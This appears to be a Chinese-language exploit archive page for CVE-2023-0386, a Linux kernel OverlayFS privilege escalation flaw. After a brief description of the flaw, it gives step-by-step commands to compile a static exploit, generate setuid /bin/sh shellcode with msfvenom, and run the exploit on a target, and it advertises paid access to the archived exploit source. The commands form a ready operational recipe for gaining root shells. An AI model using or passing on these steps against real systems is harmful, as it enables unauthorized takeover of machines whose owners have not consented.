关联漏洞
标题:
Linux kernel 安全漏洞
(CVE-2023-0386)
描述:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel存在安全漏洞,该漏洞源于在 Linux kernel的 OverlayFS 子系统中发现了未经授权访问,用户可以将一个有执行能力的文件从一个 nosuid 挂载复制到另一个挂载,这个 uid 映射错误允许用户升级他们在系统上的权限。
描述
CVE-2023-0386 包含所需运行库
介绍
安装编译环境
```bash
sudo apt install -y gcc libfuse-dev pkg-config
```
编译 exp
```bash
gcc -Wall CVE-2023-0386.c `pkg-config fuse --cflags --libs` -D_FILE_OFFSET_BITS=64 -o CVE-2023-0386-exp -static -lfuse
```
生成 shellcode
```
msfvenom -p linux/x86/exec CMD=/bin/sh PrependSetuid=True -f elf -o shellcode.elf && xxd -i -c 8 shellcode.elf
xxd -i -c 8 shellcode.elf
```
目标执行,**不需要要求目标安装 gcc 等环境**
```
chmod +x CVE-2023-0386-exp && ./CVE-2023-0386-exp
```
文件快照
[4.0K] /data/pocs/c2d81953522039087741af6da1282e55e62d1fb0
├── [6.6K] CVE-2023-0386.c
└── [ 509] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。